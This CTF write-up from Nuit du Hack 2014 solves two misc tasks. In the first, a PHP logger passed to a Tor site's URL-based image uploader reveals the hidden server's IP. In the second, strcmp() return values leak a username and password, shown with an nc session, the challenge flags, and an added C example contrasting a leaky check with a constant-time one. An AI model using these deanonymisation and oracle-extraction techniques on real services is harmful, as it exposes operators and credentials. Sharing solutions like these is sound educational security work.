Nuit du Hack CTF Quals 2014 - Misc150 and Misc200 Writeup
In this challenge we are given a Tor hidden service: http://mq72g4732yorslzf.onion/
Our task is to find out which server is hosting this service. The web site offers things like weapons and drugs, but there are no vulnerabilities to exploit there. Then we noticed an interesting image uploader where you can submit an image from your PC or from a URL. The latter option is what we need: if we submit, instead of an image, the URL of a logger, the logger will record the IP of the requester, and so the IP of the hidden service. Let's set up a logger and upload it to a site we control:
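<?php
// Echo the request metadata back to the caller.
print_r($_SERVER);
// Save the same metadata (including REMOTE_ADDR, the requester's IP) to file.txt.
file_put_contents("file.txt", implode("---", $_SERVER));
?>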
Now go to the upload form, paste the URL of your site pointing to the logger, and submit. A file called “file.txt” should now appear, and inside it you can find the IP of the hidden server: 220.127.116.11
Browsing to it leads us to the flag:
He started screaming at me saying weird shit I didn’t understand, then he just lookde blank and mumbled: “The flag .. The flag.. It is ‘0hSh1t1r4n0ut0fn00dl35´. And then he just died in front of me. Weird..
The second task set up a service that asks for a username and a password, and if they match the correct ones it will print the password. If you send an invalid username or password, the output the server returns looks like: ‘Nope (X)’. That ‘X’ is the return value of the strcmp() call between your input and the real username/password. So if, for example, you submit ‘A’ as the username and receive ‘Nope (13)’, the first character of the real username is ‘4’, because ‘A’=65 in ASCII, so 65-13=52 -> ‘4’. Repeating this character by character recovers the whole string. If you want further explanation, just read the strcmp() docs.
root@kaiman:/home/nms$ nc 18.104.22.168 3000
Please enter your username: 4dM1N15TR4T0R
Username correct, what is the password? THEpasswordISreallyLONGbutYOUllGETtoTHEendOFitEVENTUALLY
Well done! Here is the flag: YoMamaIsLikeHTML,SmallHeadAndHugeBody
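
The leak described above, side by side with a check that does not leak, as an added example that is not part of the original write-up or the challenge's code. `leaky_check`, `safe_check` and `recover` are hypothetical names; the byte-difference comparison is an assumption about how the service's strcmp() behaved, and the 0x01 probe byte is assumed not to occur in the secret.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the username from the session above stands in as the secret. */
static const char SECRET[] = "4dM1N15TR4T0R";

/* Vulnerable (assumed behaviour): like a strcmp() that returns the byte
 * difference at the first mismatch, sent back to the client as "Nope (X)". */
int leaky_check(const char *guess) {
    const unsigned char *g = (const unsigned char *)guess;
    const unsigned char *s = (const unsigned char *)SECRET;
    while (*g && *g == *s) { g++; s++; }
    return *g - *s;                       /* 0 means correct */
}

/* Hardened: touch every secret byte, reveal only match (0) or no match (1). */
int safe_check(const char *guess) {
    size_t glen = strlen(guess), slen = sizeof SECRET - 1;
    unsigned char diff = (unsigned char)(glen != slen);
    for (size_t i = 0; i < slen; i++)
        diff |= (unsigned char)((i < glen ? guess[i] : 0) ^ SECRET[i]);
    return diff != 0;
}

/* Replays the write-up's arithmetic (real = probe - X) against a local check.
 * Returns the number of queries; out holds whatever the responses revealed. */
int recover(int (*check)(const char *), char *out, size_t cap) {
    size_t n = 0;
    int queries = 0;
    while (n + 2 < cap) {
        out[n] = 0x01;                    /* probe byte, assumed absent from the secret */
        out[n + 1] = '\0';
        int real = 0x01 - check(out);
        queries++;
        if (real <= 0 || real > 255) break;  /* end of secret, or nothing leaked */
        out[n++] = (char)real;
    }
    out[n] = '\0';
    return queries;
}

int main(void) {
    char buf[32];
    int q = recover(leaky_check, buf, sizeof buf);
    printf("leaky: \"%s\" after %d queries\n", buf, q);
    q = recover(safe_check, buf, sizeof buf);
    printf("safe:  \"%s\" after %d queries\n", buf, q);
    return 0;
}
```

With the numeric result exposed, the secret falls out in one query per character plus one; with only a yes/no answer, the same responses reveal nothing about its contents.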